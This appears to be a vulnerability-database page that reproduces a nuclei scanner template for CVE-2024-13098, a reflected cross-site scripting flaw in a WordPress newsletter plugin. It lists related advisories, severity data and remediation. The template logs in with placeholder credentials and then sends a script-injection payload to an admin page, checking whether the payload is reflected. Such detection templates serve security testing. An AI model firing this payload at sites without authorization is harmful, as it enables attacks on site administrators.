Lucene search
K

WordPress Email Newsletter - Reflected XSS

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

Reflected cross-site scripting in WordPress Email Newsletter plugin up to version 1.1 due to unsanitized input.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13098
1 Feb 202506:16
circl
CVE
CVE-2024-13098
1 Feb 202506:00
cve
Cvelist
CVE-2024-13098 WP Email Newsletter <= 1.1 - Reflected XSS
1 Feb 202506:00
cvelist
EUVD
EUVD-2024-51339
3 Oct 202520:07
euvd
NVD
CVE-2024-13098
1 Feb 202506:15
nvd
OSV
CVE-2024-13098
1 Feb 202506:15
osv
Patchstack
WordPress WP Email Newsletter plugin <= 1.1 - Reflected XSS vulnerability
3 Feb 202522:04
patchstack
Positive Technologies
PT-2025-1997
1 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13098
23 May 202507:11
redhatcve
Vulnrichment
CVE-2024-13098 WP Email Newsletter <= 1.1 - Reflected XSS
1 Feb 202506:00
vulnrichment
Rows per page
id: CVE-2024-13098

info:
  name: WordPress Email Newsletter - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    WordPress Email Newsletter plugin through 1.1 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious link.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed.
  reference:
    - https://wpscan.com/vulnerability/eac71f70-993e-4353-8550-affb24c61c02/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2024-13098
    cwe-id: CWE-79
    epss-score: 0.00688
    epss-percentile: 0.48239
    cpe: cpe:2.3:a:megamindstechnologies:wordpress_email_newsletter:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: megamindstechnologies
    product: wordpress_email_newsletter
    publicwww-query: "/plugins/wp-email-newsletter/"
  tags: cve,cve2024,megamindstechnologies,wordpress-email-newsletter,wordpress,wp,wp-plugin,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=view-subscriber&search=ds"><script>alert(document.domain)</script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "><script>alert(document.domain)</script>`","wp-email-newsletter")
        condition: and
# digest: 4a0a00473045022100a8f9769f49258796eb6407627af4194c1b682c018e1357b383b5ec59edaf195d022021f5aba8648ae666b7293ee14a4dedf57bd3af41728dbbe20d34588d8cfc6f55:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation